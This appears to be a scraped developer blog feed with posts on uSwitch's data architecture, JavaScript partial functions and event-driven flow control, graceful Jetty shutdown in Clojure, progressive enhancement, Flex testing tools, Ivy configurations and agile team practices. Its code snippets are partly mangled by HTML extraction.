Yc8+lu4XyowG5sCFdoY7tmch2jIORu2zFoPMduKeCKAwds4ey7qJw652NZiVgjTAbP4OTlrlZv5QUNJSknN/hnsiILYssyYi8ddmzl7VlK6Bxnb685tiFpN2cjBfUdQPP8Fq85gNLQra38+BDUZFmjAvWX6lPips18h7rYP0zWW111CBOSw3SR/9fQ1Mv/B5287/1KHS1aNrSI5fdSNzzEmgOUtAJcT04AFZ8V8YNMbhU9rhPnzrve+Wh4QSHdzQ9emvtkaVZCPnU29H3sYv/ouy5YUJ+CX0/pjw6Ihkq9T03hQ59l/fQFWU/KXL3HpW1Jr6BEMotCuPSorK+kVuvw7SN+ku4NNb1p4t6z7dKx6ZMlbxfvkaWvWbVzbV7m0u4ObT0/zA/LVGoPY+8BD2oO33TA3V2vV5R+Jk4NYZK9pQbb9dAG6ZP15k8yPpJf1Tmbv7P1XRtjnwWpl1Ju56FGZWJyFU8/KLTNVBXoGZmDTc4dq16gnKthtYSvtp96EUMTa9Jf2JDK/R0r6WBDjX6nHixS1gdDKunsIvl1dP11v13</div></div> --> <h2><a name="leverage-ecosystem"></a>Stage 5: Leveraging uSwitch technology ecosystem</h2> <p><img src="/assets/ArchitectureV5.png" style="border:0" alt="Architecture for a better integration with the company technology ecosystem"></p> <!-- <div class="mxgraph" style="position:relative;overflow:hidden;width:100%;"><div style="width:1px;height:1px;overflow:hidden;">7Vptc9o4F/01+ZiMXwn+WNJ2093Nbp6lM+l+6ghbtjUxFiObBPrre2VfYRmZlyUYSOdhGAZf2UI+574cXXPl3k0XvwkySx94RLMrx4oWV+7HK8cJfA8+pWFZGwbOsDYkgkW1yW4MY/aDotFC65xFtGidWHKelWzWNoY8z2lYtmwxz/AncLIZSdT0jWEcksy0PrGoTGvr0Bk09nvKklT9jD0I6pGiXKo5IhqTeVZeVyYYk8NToubChSys+tBHMJZ4bFtomJG8dcEPzqctg6BFgxXeLmvffk5eWpdMuIioaJkylj/rOLqfgErBOUwkv00XdzSTdCqq/CAcEju49aIwDrxoeF3P83nf01cAC5rjYt86JUL8QrI5wvFEJwUrqcGM4PM8onIe+8odvaZwznhGQjn6Cr4LtrScZjhc4Usm1bXyeMpftCPBS1Jqx7gGKkqKjr/PnTaQQ/RQPqWlWErnwEhB38LA8Ry3Pn5tPNMe+LUt1bzyFrklSGyymrmBFb4gsnuijL+tofwlL2kiSMl4XpwS6phl2R3PeO3Ibly9wF6Ugj9TbcSqXjACq4wYsKDGcp7DZKMiJRF/hWN5Th8Eui4ycREMYh7uJEkioBFSlESUH4So0AkzUhQsVObPAP8bQoRGRgbehS+smc9F5Ttb4h/WltBN81S4b+TJsVUWRp5UVj4q/sizFkH3X78+wjS/j//+y+AG3BBuZluUwJtkLJFlIgQEZWIfSf9lUM4+4MCURZG8YJSRCc1GJHxOKtK74ufABId1F0/VS+0WXitf3MjHtXXjWG47+yn3FTSDlPPS9qEunnD2R85gFc0pPI4LcJN1IleLOIxb1AcatwDgM1DiuOieGrUwF4gXzEAzaQwzPoep30FJWs9oKlK0jDa8NRPaYAtRBwcUOogG+hiEHNQi60ue0EJGxDtXAPagDbetCoNeQJSthXcfBcQ2ldbKy1Wi/iW93A3Mun0yL7dN5fUHeY6JAbiCOaULknDI/qMZFQwWUEl+tD42pl089KKIBpjGEVnnFoNYQzboQrYXfzYTyIecZEuooG8UtL045XouCDpygSq+vWMnr92UC/JfKheovT/C7quCfo5coPYPOrSgp8d4yEWZcghykn1qrIDSBpVPF6z8pn3/V55y4++v/8O5eFmFRF/yfrt09wKU1UqQqNS9hyRUDHtrmmZ9inpngVcdVzc65qZsN6Et2Ptj90II3bYX25NQlSlPQSiu/v+EHpPQNT3mr5e0DYQCJESuRJ02kydUpb37d3wlpdeWumpF7jhfravxp3oFh3qXbU1CdxA4gTPx3NibXKueuFZ1vz38+R97B1W368i9g+N2B+ogMj3q0L2/ait4WKdXLQUs5UftDbieFfvu7WQQwbfhcNLVn+YClNIFakzfwzmUPB9ifdLEjt8hMZXtLWLHwK3D2efjV1aGKRg/gvB7ghtN+Rx0pbEVqlrB6gkO3PAuMJUsnS6gVzxLbyYEUugN8vFdSA/Ok3lGxHcIEJCuMrwiJu3Q/YbrKCmkKQaZe98jP56PzqT2AJa5fercAxyjoWwS1NHa6kONAlpiKYfkFdXBhtKn+vpa3Wta+8eve2pnrneeu6P/DanscHZ62SsgI4qfFjsNWXLMeI5wYnY6yNnA4FnYwV3l6di5rNjZ56HN+dhRKfR0ma0dO3KCc7KDVeUy2DFUsKkLHnie8I0N0Qi0QlFyIRHcpQNawqG3tr7q46h9g+ox6TKro6d0jMeS5p6i/0RUjezr6qffv3bkom6fO4ezm7uHh+X4f+ae72Kd3W8/x7UH6Njn8PVeiu7+gtVzXWXQnsOcIQQ2ednWhF/xeI4QQO/QQuAfGhUpi+ut+vuIArfde7ADnPMcYYBzXsy+7fT+jkhvFzhnc3jzP6W97A1OqDA3NcW21tyKpOPjD4fNH1zrBl/zx2X3008=</div></div> --> <p>We are now 30 months from the go live and this is our current architecture. The amount of data we produce and collect grew together with our business, and Postgres is not a viable solution anymore. We moved all our long-term analytical data to <a href="">Redshift</a>, getting us aligned to other uSwitch product teams that were already using it. Redshift now works as cross-channel data warehouse, enabling more in depth analysis and reports than before. We also replaced some of the REST based integrations with more Kafka topics: this gives us better resiliency and the benefit of a set of internal tools build for replayability.</p> <img src="" height="1" width="1" alt=""/> Javascript: how to create partial functions 2014-12-30T00:00:00+00:00 <p><a href="">Currying</a> and <a href="">partial application functions</a> are very powerful techniques widely adopted by many functional langagues.</p> <p>If you work with Javascript you can use the core function <a href="">bind</a> to easily create partial applications.</p> <p>Let’s look at an example.</p> <p>We have an array of objects:</p> <div class="highlight"><pre><code class="language-javascript" data-<span class="kd">var</span> <span class="nx">cities</span> <span class="o">=</span> <span class="p">[{</span><span class="nx">name</span><span class="o">:</span> <span class="s2">"Paris"</span><span class="p">,</span> <span class="nx">country</span><span class="o">:</span> <span class="s2">"France"<="p">{</span><span class="nx">name</span><span class="o">:</span> <span class="s2">"Rome"</span><span class="p">,</span> <span class="nx">country</span><span class="o">:</span> <span class="s2">"Italy"</span><span class="p">},{</span><span class="nx">name</span><span class="o">:</span> <span class="s2">"Manchester"</span><span class="p">,</span> <span class="nx">country</span><span class="o">:</span> <span class="s2">"UK"</span><span class="p">}];</span></code></pre></div> <p>and a function that given a city object and a specific country returns true if the city belongs to the given country:</p> <div class="highlight"><pre><code class="language-javascript" data-<span class="kd">var</span> <span class="nx">isIn</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">country</span><span class="p">,</span> <span class="nx">city</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">city</span><span class="p">.</span><span class="nx">country</span> <span class="o">===</span> <span class="nx">country</span><span class="p">;</span> <span class="p">};</span> <span class="nx">isIn</span><span class="p">(</span><span class="s2">"UK"<>What if we’d like to filter the array looking for cities that are in a specific country?</p> <p>A partial function is a good approach to solve the problem, and <em>bind</em> makes the creation of it very simple.</p> <p>The syntax of <em>bind</em> is the following:</p> <div class="highlight"><pre><code class="language-javascript" data-<span class="nx">fun</span><span class="p">.</span><span class="nx">bind</span><span class="p">(</span><span class="nx">thisArg</span><span class="p">[,</span> <span class="nx">arg1</span><span class="p">[,</span> <span class="nx">arg2</span><span class="p">[,</span> <span class="p">...]]])</span></code></pre></div> <p>Where the first parameter is the value we want to bound the <em>this</em> keyword to when the created function is invoked while the others are the actual parameters of the bound function.</p> <div class="highlight"><pre><code class="language-javascript" data-<span class="kd">var</span> <span class="nx">UKCity</span> <span class="o">=</span> <span class="nx">isIn</span><span class="p">.</span><span class="nx">bind</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="s2">"UK"</span><span class="p">);</span><span class="c1">//don't need to set the this keyword, just passing null</span> <span class="nx">UKCity<>We can now use the partial function <em>UKCity</em> as argument of the <em>filter</em> function:</p> <div class="highlight"><pre><code class="language-javascript" data-<span class="kd">var</span> <span class="nx">UKCities</span> <span class="o">=</span> <span class="nx">cities</span><span class="p">.</span><span class="nx">filter</span><span class="p">(</span><span class="nx">UKCity</span><span class="p">);</span> <span class="c1">//UKCities === [{name: "London", country: "UK"}, {name: "Manchester", country: "UK"}]</span> <span class="c1">//get the list of the Italian cities is as simple as:</span> <span class="nx">cities</span><span class="p">.</span><span class="nx">filter</span><span class="p">(</span><span class="nx">isIn</span><span class="p">.</span><span class="nx">bind</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="s2">"Italy"</span><span class="p">));</span> <span class="c1">//[{name: "Rome", country: "Italy"}]</span></code></pre></div> <p>In the example the creation of a partial application function allows us to seamlessly compose our initial <em>isIn</em> function with a <a href="">higher order function</a> like <em>filter</em> to achieve more sophisticated outcomes.</p> <p>A gist with the whole example code is available <a href="">here</a>.</p> <img src="" height="1" width="1" alt=""/> Clojure: graceful shutdown of an embedded Jetty instance 2013-07-15T00:00:00+00:00 <p>At <a href="" title="uSwitch">uSwitch</a>, several of our services are actually <a href="">Clojure</a> applications deployed with an embedded Jetty server(via the <a href="">Ring</a> adapter) which are managed via the standard Unix service interface.</p> <p>For the business critical services, zero downtime is a fundamental requirement: here comes <a href="">Jetty</a> graceful shutdown.</p> <p>Once the ready to be released uberjar is deployed, we signal the Unix service that wraps our Clojure application with a restart. As part of the shutdown process Jetty will immediately close the HTTP listener(freeing the used HTTP port and making it available to the newly deployed embedded instance) while it will still take care of completing the ongoing HTTP connections.</p> <h2>Ring 1.3.x and Jetty 7</h2> <p>If you are using Ring 1.3.x or older you are embedding Jetty 7. In that scenario this is the necessary configuration:</p> <script src=""> </script> <h2>Ring 1.4.x and Jetty 9</h2> <p>with Jetty 9 the web container is now capable of keeping track of the open threads and to completely shut down itself once the threads are completed(rather than waiting for a fixed amount of time). With Ring 1.4.x and higher the code will then look like:</p> <script src=""> </script> <img src="" height="1" width="1" alt=""/> Web development in the large 2013-03-10T00:00:00+00:00 <p>Web development has drammaticaly changed over the past 5 years. Frameworks like <a href="">Rails</a> imposed themselves as the go-to choice for an increased productivity; new stacks like <a href="">NodeJS</a> emerged and offered alternatives ways of tackling web products development.</p> <p>Despite all these goodies offered by these tools, web development often ends up being way harder than what it should be. Teams sink in a never ending bug list, often adding unneeded techical complexity in the attempt to offer a better user experience and hence very quickly transforming the application in an uncontrolled ball of mud.</p> <p>From my direct experience in building public facing web products, there are few core ideas that have to be the pillars of any web products; these are language/framework agnostic – even if certain tools support these principles better than others.</p> <p>These reccomendations are mostly related to a scenario where a pure single page web app is not a viable solution(check the <a href="#target-audience">this</a> section for a more in depth analysis). Some of these principles are appliable even if you are targeting that style but might be less effective.</p> <h2><a id="target-audience"></a>Understand your target audience</h2> <p>You want to have a very clear idea of the browsers you have/want to support. Building a product that works only on HTML5 friendly browsers while the 50% of your audience is on IE8 is not the best way to give your product the right boost. If you are replacing an exisiting product use <a href="">Google Analytics</a> historical data to understand the current browsers segmentation, while if you are building something totally new invest some time in understanding who your customers will be. Knowing your audience can influence heavily the architecture of your application: a single page app can be a perfect fit for a mobile only app( most of the mobile browsers are HTML5 friendly) but it might be a bad choice for a product that has to be consumed by less modern browsers.</p> <h2>Use aggressively progressive enhancement techniques</h2> <p>Build every feature ground up. The more your website works without javascript, the more extensible it wil end up being.</p> <p>What this really means?</p> <ul> <li><p>Your product <strong>has</strong> to work without javascript. Of course this is heavily influenced by the <a href="#target-audience">previous guideline</a>, but unless you are building a 100% single page app you should always ask yourself how do build a feature starting from the HTML over HTTP flow.</p></li> <li><p>Once the HTML over HTTP feature is there, enhance components via javascript in order to improve the experience.</p></li> <li><p>Go for multi layered enhancement approach.</p> <ol> <li>Look at what <a href="">HTML5 features</a> are available on the browsers you want to support and if possible rely on them(datepicker and validation are two good examples of HTML5 features that are getting more and more support).</li> <li>If there’s no native support for certain browsers then smoothly degrade to a javascript version</li> <li>Finally if the javascript version results in an heavy experience on specific devices just leave the basic functionality without any bells and whistles.</li> </ol> </li> </ul> <p>The advantage in this case is a consistent reduction of the code you have to take care of over time; because HTML5 features are natively built into the browsers you will have a performace boost for free. Also they are often already supported on mobile browsers, giving for free a native experience in the mobile version of the product.</p> <h2>Prefer html snippet over JSON</h2> <p>JSON is extremely powerful and easy to use, but it’s not the solution for everything. Often we need to pass data from the server side to the browser as a consequence of an AJAX request to build new parts of the interface.</p> <p>Unless you are thinking of consuming the exposed JSON data from an heteregenous set of clients you should just expose HTML snippet that you can then embed directly into your page.</p> <p>This approach gives you:</p> <ul> <li>Progressive enanchement out of the box.</li> <li>A substantial reduction in client side computation, something that is critical for less modern browsers.</li> <li>A massive reduction of of your front-end code spread If you let the server-side to build the HTML snippet you you can use your favourite markup/markdown without the need of hand rolling your version client side or importing yet another dependency into the browser.</li> </ul> <h2>Use HTTP Status codes</h2> <p>The <a href="">HTTP protocol</a> contains everything you need to control and define the interaction between different parties in a scalable and fault tolerant way. When you need to return a specific status to your ajax call there’s no need of reinventing the wheel sending any custom JSON object to say that an error happened or that the specific operation is not acceptable, just use the right <a href="">HTTP status code</a>. Embracing a HATEOAS architectural style can help you in shaping your systems and APIs, going beyond the basic CRUD with a more holistic view of your system as a good citizen in the HTTP stack.</p> <h2>Leverage HTTP caching</h2> <p>Thr HTTP protocol gives you a wide range of <a href="">caching options</a> through header directives. Before introducing a cache at the domain model layer ask yourself if the same couldn’t be achieved at HTTP level.</p> <h2>Think about resource shareability (urls with resource id)</h2> <p>The web is really about sharing and URLs are the way we share resources.</p> <p>Use URLs containing the resource id to epxose the different states of your resources to the world and use authentication and authorization layers to control resource access.</p> <p>Don’t be tempted to to trade off unicity of the resource URL with the pretty link bells; links that are easy to read and rember for humans are a nice to have, but not all the time this style supports the needs of your application. Even if your web application doesn’t demand the share sharing this is a valid test to verify the solidity of your system: would it be easier to expose a resource to a third party? Is a specific state of a resource uniquely identified by a URI? If the answer to these questions is no there’s a clear smell that the application is not using the right semantic to move from an internal state to another.</p> <img src="" height="1" width="1" alt=""/> Flow control in Javascript 2011-09-26T00:00:00+00:00 <p><a href="">Mark Needham</a> recently wrote a <a href="">blog post</a> on how his team worked around a Javascript asynchronous unwanted behaviour.</p> <p>They want to iterate over a collection, executes some code for each element of the collection and only when all the collection has been traversed execute a final step.</p> <script src=""></script> <p>This didn’t work as expected. Due to the asynchronous nature of Javascript the <em>do something with grid</em> block is invoked before the grid itself is filled and nothing interesting happens.</p> <p>Their solution to this was removing any possible event driven behaviours and handling control in a fullly imperative way, explicitly calling functions in the expected sequence.</p> <script src=""></script> <p>This works but it’s not leveraging Javascript nature; also the code itself results harder to understand then what it should be.</p> <p>How the same problem can be solved embracing asynchronous thinking ?</p> <script src=""></script> <p>The way to achieve control flow in Javascript is with events.</p> <p>When a block is completed it emits an event. All the interested parties will be listening to the specific event and execute their specific task, contributing to our overarching business flow. This alternative solution is probably also more idiomatic and as a consequence more coincise and easier to read.</p> <img src="" height="1" width="1" alt=""/> Introducing node-tail: a NodeJS tail library 2011-09-15T00:00:00+00:00 <p>In the <a href="" title="firehose" target="_blank">previous blog post</a> I described the architecture of the firehose we built at <a href="" title="forward Internet Group" target="_blank">Forward</a> with NodeJS.</p> <p>At the lowest level each node has to tail a log file. <a href="">Tom Hall</a> and I couldn’t find any useful cross-platform (i.e. not relying on the unix <em>tail</em> command) node module for that task so I ended up writing <a href="">node-tail</a>.</p> <p>Using node-tail is very simple:</p> <script src=""></script> <p>node-tail is also available via npm, just install it with: <code>npm install tail</code></p> <img src="" height="1" width="1" alt=""/> Building a firehose with NodeJS 2011-09-12T00:00:00+00:00 <p>In <a href="" target="_blank">Forward</a> we handle a huge stream of real time data and we are always looking for interesting ways to use that.</p> <p>We already have a <a href="" title="Hadoop" target="_blank">Hadoop</a> cluster for high latency analysis (mostly reporting), but recently we started building a set of tools that can give us a near real-time view of what’s going on. With this goal in mind I have been recently involved in building a data firehose with <a href="">NodeJS</a>.</p> <p>The result is the following: <img src="/assets/firehose.png"></p> <p>The lowest layer of the firehose is a thin component installed on each server that tails the log file we care about and publishes each log entry to a collector (called firehose-master) via <a href="">ZeroMQ</a>. The master collects the log entries from all the nodes and republishes everything to the rest of our software ecosystem as a single stream via a single <a href="" title="ZeroMQ" target="_blank">ZeroMQ</a> end point.</p> <p>With this architecture we easily preserve the horizontal scalability of our main service, in fact adding a new node to the firehose is as simple as installing the tail component on the new server and adding its IP address to the master configuration file.</p> <p>This stream can now be the core foundation of clients that consume the firehose for different purposes, from real-time trends visualisation to <a href="" title="HDFS" target="_blank">HDFS</a> data bulk load.</p> <img src="" height="1" width="1" alt=""/> Javascript testing 2010-06-15T00:00:00+00:00 <p>Javascript has become in the last year <em>the</em> language for rich web applications, but still it rarely receives the level of attention it deserves.</p> <p>Libraries such <a href="" title="jQuery" target="_blank">jQuery</a> boost our productivity but the code we often end up writing tend to be a <a href="" title="big bal of mud" target="_blank">big ball of mud</a>, with an entangled mix of presentation logic, busines logic and server side interaction, all incredibly hard to test and to maintain.</p> <p>It’s time to move away from this approach and start writing better quality Javascript.</p> <p>The very first step required to avoid Javascript spaghetti code is start thinking to <strong>Javascript as a</strong><strong> first class language</strong>, and start dealing with it with the same mindset and approach we would use for any server side language.</p> <p>With this new approach in the same way we identify roles and integration points in server side code we want to start building <strong>abstractions</strong> in our Javascript codebase.</p> <p>With the right abstractions in place we are defining clear boundaries between different parts of the system, and as a consequence our code is simpler, we promote reuse and the <a href="'t_repeat_yourself" title="DRY principle" target="_blank">DRY principle</a>, and we are finally enabling better testing.</p> <p>Let’s look at any standard Web 2.0 Javascript code from this new perspective: now the DOM and HTTP are two clear integration points.</p> <p>Our javascript code manipulates the DOM adding &nodes or changing existing nodes content in the same way any other language would interact with a database.Each call to a server over HTTP via Ajax is exactly the same of calling a web server from our server side code.</p> <p>With these very two first abstractions in mind, we can start rewriting our code, isolating these interactions behind clearly defined objects.</p> <p>Now the javascript code is not a ball of mud anymore, but a network of objects that collaborate. With these smaller objects in place we can now<strong> favour interaction based tests</strong>, moving away from any dependency on the DOM and on the HTTP protocol.</p> <p>The identified abstractions let me actually mock and stub things out and test if the different tiers in my javascript code are exchanging the right messages. This separation of concerns keep the business logic nicely isolated from the user interface transformations, enabling also a cleaner state based testing for that specific part of the code (there are no more dependencies on the DOM).</p> <img src="" height="1" width="1" alt=""/> Italian Agile Day 2009: date announced 2009-08-02T00:00:00+00:00 Friday, 20th of November 2009, the <a href="" title="Italian Agile Day" target="_blank">6th Italian Agile Day</a> will be held in Bologna. It's a great opportunity to share experiences and practices, learn, discuss and meet other praticioners part of the Agile community...and it's free :-) I'll see you there ! <img src="" height="1" width="1" alt=""/> What has to be ready for the beginning of a project? 2009-07-05T00:00:00+00:00 <p>The beginning of a project is always a hectic period where several things have to be put in place in order to be able to start the actual development from a solid position.</p> <p>Interestingly enough, I see that what is important to have ready for ThoughtWorkers most of the time is not what has to be ready for other people.</p> <p>Given that obviously every project is different and deserves specific attention, here is my list of things that has to be ready before the kick off of iteration 1.</p> <p><strong>Infrastructure</strong></p> <p>A repository, a Continuos Integration Environment with <a href="" title="Cruise" target="_blank">Cruise</a> (or suitable alternatives) installed and working, a QA environment where we can deploy every successful build whenever we want, a basic build script (i.e. build/run tests/package). Pairing boxes, each one with exactly the same configuration.</p> <p><strong>Architecture</strong></p> <p>Just identify the core services/components, there’s no need to go into detail for each one at this time of the project. If we identify what is the main responsibility of a service is good enough for now, the details will be discovered later in the project. If we can easily identify the way services will communicate (web service? message broker?) good, if not through good OO principles we can abstract the low level mechanism and reduce the cost of change later, deferring the final decision to the point in the project where we have more understanding of the technological constraints.</p> <p><strong>Patterns</strong></p> <p>Pairing and frequent pair rotation will help in spreading the knowledge of the approach to solve specific problems and in maintaining consistency throughout the code base, so most of the time there is no need of defining a sort of “project dictionary” of valid patterns at day 1. If we’re introducing new approaches to solve a specific problem, it’s important to highlight pros and cons of the approach so that people know what they are doing once pairing.</p> <p>Most of the time these are probably enough to start Iteration 1.</p> <p>All the other decisions can (and sometimes should…) be deferred to a later stage.</p> <img src="" height="1" width="1" alt=""/> QA productivity metrics 2009-03-31T00:00:00+00:00 <p>In a lot of companies the QAs productivityi s measured through the number of defects she raised: the more defects she finds, the harder she works, therefore the better she is.</p> <p>This approach has an interesting corollary: if you have really good QAs you don’t have good developers. If your QAs are finding a lot of defects this means that your developers are quite poor and are regularly introducing defects in the code base.</p> <p>This approach isn’t obviously team oriented: QA and Development are seen as two separate and independent entities that interact through a specific contract.</p> <p>If we truly believe in collaboration the most important productivity metrics are not related to a specific role/skills set but to the team capability of deliver quality software in time and in budget.</p> <p>We need to ask ourselves why the defects are finding their way into the application deployed in the live environment (incomplete acceptance criteria? not enough analysis or understanding of the domain? gap in the test suite?), and fix the issue as a team, not just using that number as the boundary between two work streams.</p> <img src="" height="1" width="1" alt=""/> Local optimization doesn't necessarily mean improvement 2009-02-14T00:00:00+00:00 <p>Delivering software is a pretty complex activity that requires interaction between people with different skill sets. One of the cornerstone of Agile Development is continuous improvement, and one of the tool often used to learn and improve is the <a href="" title="Retrospectives" target="_blank">retrospective</a>.</p> <p>In a context where the collaboration is not effective, people tend to look for local optimization instead of seeing the big picture, and you have things such the “QA retrospective” or the “Developer retrospective”.</p> <p>In this scenario a “QA retrospective” (as the Dev’s one, or a BA’s one) is probably more harmful than anything else; the specific issues that will be identified won’t address the whole activity of delivering software but will only be focused on that specific step (“we need <em>x</em> to do y”).</p> <p>But what is the impact of that step in the overall process ?</p> <p>How that step fits into the chain of event that will take a business idea to be delivered as a software artifact (hopefully in a timely and quality fashion ) ?</p> <p>Don’t get me wrong: it’s definitively through specific improvements that you improve your overall process but if don’t frame your changes in the big picture, it’s more likely that your changes will impact your process in the wrong direction and actually cause an additional waste.</p> <p>Each attempt of optimization should therefore start from the clear analysis of what is wrong from a high level point of view and only then it’s time to shift our attention to the specific details of each step.</p> <img src="" height="1" width="1" alt=""/> Acceptance Testing of Flex applications 2009-01-26T00:00:00+00:00 <p><a href="" title="Acceptance Testing" target="_blank">Acceptance Testing</a> is a fundamental practice: it gives you confidence that your application behaves as expected from the end customer point of view.</p> <p>In the <a href="" title="Flex" target="_blank">Flex</a> world there are some projects that are currently emerging in the Acceptance Testing space, each one with specific advantages and weak points.</p> <p>Let’s have a look at some of these.</p> <p><strong>FlexMonkey</strong></p> <p><a href="" title="FlexMonkey" target="_blank">FlexMonkey</a> Open source but based on closed source API (the <a href="" title="Automation API" target="_blank">Automation API</a> are released only with <a href="" title="FlexBuilder" target="_blank">FlexBuilder</a> and not with the open source Flex SDK), it’s based on the record-playback approach and as far I have seen is not easily integrable with a Continuous Integration server.</p> <p><strong>Flash-Selenium</strong></p> <p><a href="" title="Flash-Selenium" target="_blank">Flash-Selenium</a> is open source, and it works as an extension of SeleniumRC; the tests can be written in Java, .Net, Ruby or Phyton and the integration with a Continuous Integration server is therefore quite out of the box. <strong><a href="" title="SeleniumFlex API" target="_blank"> </a></strong><strong>SeleniumFLex API</strong> <a href="" title="SeleniumFlex" target="_blank">SeleniumFlex</a> is another open source project. it’s an extension of SeleniumIDE, test should be written in Selenese.</p> <p><strong>FunFX</strong></p> <p><a href="" title="FunFX" target="_blank">FunFX</a> is based on the automation API (therefore you can use it only if you’re owner of FlexBuilder), the fixtures are written in Ruby.</p> <p>At the moment there isn’t a de-facto solution: the community is quite dynamic and all these different tools are trying to find their space.</p> <p>Which one is my favourite ?</p> <p>It’s really hard to say, I think that the context matters a lot. I don’t like solutions that require the Automation API simply because this hooks you to a vendor just for testing; it’s also true that the pure open source solutions require some extra-hack (like exposing methods through <a href="" title="ExternalInterface" target="_blank">ExternalInterface</a>) that is less than ideal.</p> <p>Looking at the two pure open source tools I like Flash-Selenium for its out of the box integration with Continuous Integration server, while I prefer Selenium-Flex approach for handling the necessary ExternalInterface configuration.</p> <img src="" height="1" width="1" alt=""/> Signs of poor communication 2008-09-28T00:00:00+00:00 <p>Walking in an office and just looking around for 10 minutes is enough to have a feeling of the level of communication in that environment.</p> <p>When:</p> <ul> <li>co-located people communicate mainly via IMs, mails, or comments on online collaborative tools instead of face-to-face conversation</li> <li>a heavyweight tool is the preferred way for driving the work flow instead of using it only for backup and tracking</li> <li>on the whiteboard you can read the outcomes of the retrospective of 7 months before</li> </ul> <p>There’s <em>definitively</em> something wrong.</p> <p>What about your team? How many of the above bullet points are you ticking off?</p> <img src="" height="1" width="1" alt=""/> Flex: How to achieve proper separation of responsibilities 2008-06-24T00:00:00+00:00 <p>In a <a href="" title="Working with Adobe Flex" target="_blank">previous post</a> I was discussing on my experience with Flex and one of the highlighted pain points is the extremely poor quality of the available tutorials.</p> <p>Let’s have a look at the source code of the <a href="" title="Flickr Tutorial" target="_blank">Flick tutorial</a>:</p> <script src=""></script> <p>In a single page you have:</p> <ul> <li>The declaration of visual components (<em>TileList</em>)</li> <li>the declaration of non visual component (<em>HTTPService</em>)</li> <li>event handling (<em>photoHandler</em>)</li> <li>data binding (<em>photoFeed</em>)</li> <li>pure logic (<em>requestPhotos</em>)</li> </ul> <p>If you decide to follow this development model you will obtain something that is extremely fragile to evolve or simply just to maintain.</p> <p>Let’s start assigning the right responsibilities to the right objects.</p> <p><strong>The first step</strong> is creating our own Application object and use it as root in the mxml file:</p> <script src=""></script> <p>Now the HttpService component is not exposed anymore (and ideally can also be injected) and the events handling in the right place.</p> <p><strong>The second step</strong> is to extend the HttpService object to place the <em>requestPhotos</em> behaviour in the service. The result is below:</p> <script src=""></script> <p>At the end of this refactoring our mxml file looks like this:</p> <script src=""></script> <p>Here now we are declaring only visual components, and its only role is defining what we want to see and how.</p> <img src="" height="1" width="1" alt=""/> Working with Adobe Flex 2008-06-21T00:00:00+00:00 <p><a href="" target="_blank">RIA</a> is a pretty hot topic in these days; even in <a href="" target="_blank">ThoughtWorks</a> a lot of discussions are going on (if you have time check fellow ThoughtWorkers posts <a href="" target="_blank">here</a>, <a href="" target="_blank">here</a> and <a href="" target="_blank">here</a>).</p> <p>I’m quite involved in the conversation, mostly due to the use of <a href="" title="Flex" target="_blank">Adobe Flex </a>in my current project.</p> <p><strong>What is Flex ?</strong></p> <p>Flex is the Adobe solution for RIA; based on <a href="" target="_blank">ActionScript</a>, it promises quick development of rich UI, the ability of testing and TDD-ing, good tools for development and out of the box integration with Web Services and REST services.</p> <p>Everything sounds cool, but my experience with Flex highlighted few elements that worth a bit of attention…let’s analyze those one by one.</p> <p><strong>Testability</strong></p> <p>ActionScript is actually really hard to test.</p> <p>A Unit testing framework (<a href="" target="_blank">FlexUnit</a>) is available but it cannot be used by command line because the test runner works only in your browser; this slow down your development cycle (red-green-refactor) quite a lot, reducing your effectiveness during the day.</p> <p>ActionScript is a half way between a static and a dynamic language (with a clear direction towards being a pure static language, my guess is that the language designers are trying to increase the language appeal to the Java and the .Net community).The main concert here is you miss the testing support of static languages(mock libraries mostly) and of a dynamic one you’re missing the complete dynamic approach(all the classes are sealed by default, and you can’t do methods override at runtime even for objects that are explicitly declared dynamic).</p> <p>In this scenario interaction testing is nearly impossible to do; sure, you can write your own mock library or stub everything out but this is a pretty strategic decision and a lot depends on the scope of the project.</p> <p><strong>Flex Security Model</strong></p> <p>Another aspect that gave us more than one trouble is Flex security model.</p> <p>A Flex application can connect to a WebService or a REST service only if:</p> <ul> <li>the target service is on the same domain where the Flex application is deployed</li> <li>the target service is on an external domain but in the target domain there is a <em>crossdomain.xml</em> file that declares your domain as secure</li> </ul> <p>What does it mean ? That if I want to access a public feed (let’s say the BBC weather feed) BBC has to have my domain specified on its <em>crossdomain.xml</em> file that lives on its server.</p> <p>This is a strong limitation: you cannot simply call BBC and ask to add your domain to their list of trusted site, and this take you down the path of over design your application (like adding a proxy web service on your domain just to be able to get the real data you need from BBC).</p> <p><strong>Tutorials and suggested best practices</strong></p> <p>A final comment is for the Adobe tutorials: it’s hard to see in 2008 something so poor. The tutorials (have a look at the <a href="" target="_blank">Flickr one</a> to have an idea) are a collection of bad practices: the suggested development style is spaghetti-code, where you write all the code in the Script tag within your main Flex application file (mxml).</p> <p>And what about separation of responsibilities ? Do we really think that this is the code you obtain doing TDD ?</p> <p>The heavily usage of the Script tag will take you down maintenance nightmares, transforming your application in something that is quickly out of your control and you cannot evolve.</p> <p><strong>Final thoughts</strong></p> <p>Looking at these pain points I can’t sat that Flex is a mature technology. Adobe promises a lot but a number of the promises are not there; TDD is simply too hard to do due to the lack of mock support(even if <a href="" title="TDD in Flex" target="_blank">looks promising</a>), the set of possible permissions you can give to the Flash player clashes with the new services oriented features (introducing cumbersome security model that take you to overdesign as a possible workaround), and tooling is quite poor (FlexBuilder, the IDE, crashes regularly and the Ant task is pretty basic).</p> <img src="" height="1" width="1" alt=""/> Article: Seniority, Respect, Authority and an Agile Team 2008-05-25T00:00:00+00:00 <a href="" title="Seniority, Respect, Authority and an Agile Team" target="_blank">Here</a> on <a href="">InfoQ</a> some interesting thoughts around Seniority and Authority in an Agile team. <img src="" height="1" width="1" alt=""/> Article: Patrick Kua on the Agile Coach role 2008-05-25T00:00:00+00:00 <a href="" title="Agile coach A to Z" target="_blank">Here</a> a really good article from my friend <a href="" target="_blank">Patrick Kua</a> on the Agile Coach role. <img src="" height="1" width="1" alt=""/> Ivy: how to download dependencies to different folders 2008-04-17T00:00:00+00:00 <p><a href="">Ivy</a> is a dependency manager that lets you define in a declarative way directly in the build file the dependency of your project.</p> <p>In order to download dependencies in different folders (i.e. separate the runtime dependencies from the testing ones) you have to define configurations.</p> <p>Let’s say we have this project structure:</p> <ul> <li>lib <ul> <li>prod</li> <li>test</li> </ul> </li> </ul> <p>We need three different things to achieve our goal:</p> <p>The first step is defining in your ivy.xml a configuration for each folder:</p> <script src=""></script> 